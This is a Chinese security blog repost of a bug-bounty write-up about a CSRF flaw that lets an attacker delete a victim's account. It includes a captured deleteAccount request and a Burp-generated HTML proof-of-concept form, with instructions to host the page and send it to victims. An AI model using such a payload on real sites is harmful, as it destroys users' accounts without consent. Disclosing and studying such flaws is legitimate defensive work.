文章总结: 文档详细介绍了利用CSRF漏洞删除用户账户的完整流程,包括通过BurpSuite捕获删除请求、生成CSRF攻击代码的具体步骤。关键发现是目标站点未校验请求来源,导致任意用户点击恶意链接即可触发账户删除。建议开发者添加CSRF令牌验证等防护措施。 综合评分: 70 文章分类: WEB安全,漏洞分析,实战经验,安全工具,安全意识
csrf删除用户
原创
h1 h1
迪哥讲事
2026年4月28日 10:01 四川
在小说阅读器读本章
去阅读
csrf删除用户
正文
复现步骤:
1.进入“创建账户”页面
2.点击你的个人资料(Profile)
3.你会看到“删除账户(DELETE ACCOUNT)”按钮
4.点击该按钮,并在输入框中输入 YES
5.确保你的 Burp Suite 已开启,然后点击删除账户按钮
请求示例:
POST /users/deleteAccount HTTP/1.1
Host: ██████
Cookie: _ga=...; session=...; session.sig=...
User-Agent: Mozilla/5.0 ...
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: https://███████
Referer: https://█████/users/deleteAccount
Content-Length: 0
Connection: close
利用方法:
1.捕获该请求
2.右键 → Engagement Tools → Generate CSRF PoC(生成 CSRF 攻击代码)
生成的示例代码如下:
<html>
<!-- CSRF PoC - 由 Burp Suite Professional 生成 -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://████/users/deleteAccount" method="POST">
<input type="submit" value="提交请求" />
</form>
</body>
</html>
攻击方式说明:
将上述 HTML 代码部署到你的服务器,并将该页面发送给受害者。 一旦受害者打开该页面,其账户将被删除。
如果你是一个长期主义者,欢迎加入我的知识星球,本星球日日更新,包含号主大量一线实战,全网独一无二,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
往期回顾
#
如何利用ai辅助挖漏洞
#
如何在移动端抓包-下
#
如何绕过签名校验
#
一款bp神器
挖掘有回显ssrf的隐藏payload
ssrf绕过新思路
一个辅助测试ssrf的工具
dom-xss精选文章
年度精选文章
Nuclei权威指南-如何躺赚
漏洞赏金猎人系列-如何测试设置功能IV
漏洞赏金猎人系列-如何测试注册功能以及相关Tips
参考
https://hackerone.com/reports/1629828
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:迪哥讲事 h1 h1《csrf删除用户》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论